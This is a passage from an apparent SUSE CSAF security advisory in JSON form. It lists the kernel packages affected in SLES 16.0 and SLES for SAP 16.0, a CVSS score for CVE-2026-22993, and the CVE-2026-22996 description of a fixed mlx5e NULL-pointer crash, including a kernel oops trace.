"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22993"
},
{
"cve": "CVE-2026-22996",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22996"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv\n\nmlx5e_priv is an unstable structure that can be memset(0) if profile\nattaching fails, mlx5e_priv in mlx5e_dev devlink private is used to\nreference the netdev and mdev associated with that struct. Instead,\nstore netdev directly into mlx5e_dev and get mdev from the containing\nmlx5_adev aux device structure.\n\nThis fixes a kernel oops in mlx5e_remove when switchdev mode fails due\nto change profile failure.\n\n$ devlink dev eswitch set pci/0000:00:03.0 mode switchdev\nError: mlx5_core: Failed setting eswitch to offloads.\ndmesg:\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n\n$ devlink dev reload pci/0000:00:03.0 ==\u003e oops\n\nBUG: kernel NULL pointer dereference, address: 0000000000000520\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 3 UID: 0 PID: 521 Comm: devlink Not tainted 6.18.0-rc5+ #117 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_remove+0x68/0x130\nRSP: 0018:ffffc900034838f0 EFLAGS: 00010246\nRAX: ffff88810283c380 RBX: ffff888101874400 RCX: ffffffff826ffc45\nRDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000\nRBP: ffff888102d789c0 R08: ffff8881007137f0 R09: ffff888100264e10\nR10: ffffc90003483898 R11: ffffc900034838a0 R12: ffff888100d261a0\nR13: ffff888100d261a0 R14: ffff8881018749a0 R15: ffff888101874400\nFS: 00007f8565fea740(0000) GS:ffff88856a759000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000520 CR3: 000000010b11a004 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n device_release_driver_internal+0x19c/0x200\n bus_remove_device+0xc6/0x130\n device_del+0x160/0x3d0\n ? devl_param_driverinit_value_get+0x2d/0x90\n mlx5_detach_device+0x89/0xe0\n mlx5_unload_one_devl_locked+0x3a/0x70\n mlx5_devlink_reload_down+0xc8/0x220\n devlink_reload+0x7d/0x260\n devlink_nl_reload_doit+0x45b/0x5a0\n genl_family_rcv_msg_doit+0xe8/0x140",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
